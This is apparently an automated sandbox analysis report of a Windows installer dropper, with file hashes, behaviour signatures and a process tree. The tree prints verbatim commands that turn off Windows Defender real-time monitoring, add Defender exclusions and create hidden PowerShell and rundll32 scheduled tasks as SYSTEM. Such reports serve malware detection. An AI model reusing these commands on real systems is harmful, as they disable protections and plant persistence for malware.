Analysis
-
max time kernel
151s -
max time network
151s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
-
submitted
06/10/2022, 22:02
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
4c028f08ca47d06b4e7d53a170225357
-
SHA1
7f09f770c8f136f31b4635cc80757768a044c39c
-
SHA256
1db40bbcd1e962f710568bf7285164d8c72acc405e6d4d0a8bc4556c5f3ce28d
-
SHA512
194c745ef0631255e765251fe35454a3f433b5289bea86c97654d6bdf191ba98f99c760c0d60f46581aa1a0476cc9eea1357375fa1a4630578a701f6220a0d00
-
SSDEEP
196608:91OtvITWu4dZHdIfC6h4EStvJ9YfFAVkBDVAguVIrlwH:3OtQWtuq0sBoewDfuVIrlwH
Malware Config
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
-
Windows security bypass 2 TTPs 36 IoCs
-
Executes dropped EXE 4 IoCs
-
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Loads dropped DLL 8 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
-
Drops file in System32 directory 22 IoCs
-
Drops file in Program Files directory 13 IoCs
-
Drops file in Windows directory 4 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 2 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies system certificate store 2 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 22 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSF6CE.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSFA18.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gxWfJpcNn" /SC once /ST 00:00:41 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gxWfJpcNn"4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gxWfJpcNn"4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bWfTenrnZRhiBbesVI" /SC once /ST 00:03:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\RrGfQtYPiwOkePUDv\VKXYZpUBOsBjTnk\nhwPbzB.exe\" 1d /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {C1771616-0CB0-4E75-A6EA-3BB731B29297} S-1-5-21-3845472200-3839195424-595303356-1000:ZERMMMDR\Admin:Interactive:[1]1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {5F3365B8-F4C5-45D8-B572-7B936984B368} S-1-5-18:NT AUTHORITY\System:Service:1⤵
-
C:\Users\Admin\AppData\Local\Temp\RrGfQtYPiwOkePUDv\VKXYZpUBOsBjTnk\nhwPbzB.exeC:\Users\Admin\AppData\Local\Temp\RrGfQtYPiwOkePUDv\VKXYZpUBOsBjTnk\nhwPbzB.exe 1d /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gUTDKNAzk" /SC once /ST 00:01:35 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gUTDKNAzk"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gUTDKNAzk"3⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gpCOCOJoa" /SC once /ST 00:00:22 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gpCOCOJoa"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gpCOCOJoa"3⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yUSqPVaaVaTonAKz" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yUSqPVaaVaTonAKz" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yUSqPVaaVaTonAKz" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yUSqPVaaVaTonAKz" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yUSqPVaaVaTonAKz" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yUSqPVaaVaTonAKz" /t REG_DWORD /d 0 /reg:324⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yUSqPVaaVaTonAKz" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yUSqPVaaVaTonAKz" /t REG_DWORD /d 0 /reg:644⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\yUSqPVaaVaTonAKz\dcHzSwbL\RKIYSKyXinZEzpYF.wsf"3⤵
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\yUSqPVaaVaTonAKz\dcHzSwbL\RKIYSKyXinZEzpYF.wsf"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CGnJgFCBAzUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CGnJgFCBAzUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DGkdqERBU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PFmWviqWHYwU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DGkdqERBU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PFmWviqWHYwU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VyejTHXZDswSKCkodlR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VyejTHXZDswSKCkodlR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mClEBLvlRMFiC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mClEBLvlRMFiC" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\WUQzEHOimFfJbvVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\WUQzEHOimFfJbvVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\RrGfQtYPiwOkePUDv" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\RrGfQtYPiwOkePUDv" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yUSqPVaaVaTonAKz" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yUSqPVaaVaTonAKz" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CGnJgFCBAzUn" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DGkdqERBU" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CGnJgFCBAzUn" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DGkdqERBU" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PFmWviqWHYwU2" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PFmWviqWHYwU2" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VyejTHXZDswSKCkodlR" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VyejTHXZDswSKCkodlR" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mClEBLvlRMFiC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mClEBLvlRMFiC" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\WUQzEHOimFfJbvVB" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\WUQzEHOimFfJbvVB" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\RrGfQtYPiwOkePUDv" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\RrGfQtYPiwOkePUDv" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yUSqPVaaVaTonAKz" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yUSqPVaaVaTonAKz" /t REG_DWORD /d 0 /reg:644⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gZnVWDPrW" /SC once /ST 00:01:15 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gZnVWDPrW"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gZnVWDPrW"3⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "jCymsroQFbYeGMouD" /SC once /ST 00:01:41 /RU "SYSTEM" /TR "\"C:\Windows\Temp\yUSqPVaaVaTonAKz\eQZzzKLpMZsikyh\EuzpuHZ.exe\" UZ /site_id 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "jCymsroQFbYeGMouD"3⤵
-
-
-
C:\Windows\Temp\yUSqPVaaVaTonAKz\eQZzzKLpMZsikyh\EuzpuHZ.exeC:\Windows\Temp\yUSqPVaaVaTonAKz\eQZzzKLpMZsikyh\EuzpuHZ.exe UZ /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bWfTenrnZRhiBbesVI"3⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\DGkdqERBU\KnKMMf.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "PPsmXAxsGZAbEXH" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PPsmXAxsGZAbEXH2" /F /xml "C:\Program Files (x86)\DGkdqERBU\DVjhSwn.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "PPsmXAxsGZAbEXH"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "PPsmXAxsGZAbEXH"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "WHQzDDOHAZqOHK" /F /xml "C:\Program Files (x86)\PFmWviqWHYwU2\LEaLZEO.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "pXGIZihhpDsVF2" /F /xml "C:\ProgramData\WUQzEHOimFfJbvVB\tMLtGPI.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "iQPxrWWaWFquCysLb2" /F /xml "C:\Program Files (x86)\VyejTHXZDswSKCkodlR\uWMrOJr.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "squTHRQnmBqJEUNkdBT2" /F /xml "C:\Program Files (x86)\mClEBLvlRMFiC\USvyhDa.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "vuBtYGxUFUjHFzcbJ" /SC once /ST 00:03:19 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\yUSqPVaaVaTonAKz\VoeLCEJD\MnqPlEM.dll\",#1 /site_id 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "vuBtYGxUFUjHFzcbJ"3⤵
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD54ba6aff1504ccabeb840bffb3f588b76
SHA1b86bf55ec80d53744b07406d535888616a007a5a
SHA256350123289f4c6f36735347151da68fe8033098acbd443591816882cfec45ce54
SHA5127f75bb7221039df08a2f391880fa0d27dfabe5c65cf5fe85bc81d92c177bd62e9370d084e51eaed6f8110743f32000ec7668a114c6cd92b9c612bb24bec05605
-
Filesize
2KB
MD5b9350259777a7749a54abdb004a77f3c
